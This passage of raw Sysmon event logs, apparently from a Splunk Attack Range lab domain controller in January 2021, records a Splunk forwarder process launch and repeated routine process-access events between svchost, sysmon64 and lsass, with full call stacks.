Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.079{59A5CD1D-8E58-6005-3900-00000000A301}3640C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{59A5CD1D-8E57-6005-3700-00000000A301}3520C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvars 10341000x80000000000000001626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.017{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.017{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.017{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.986{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.986{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 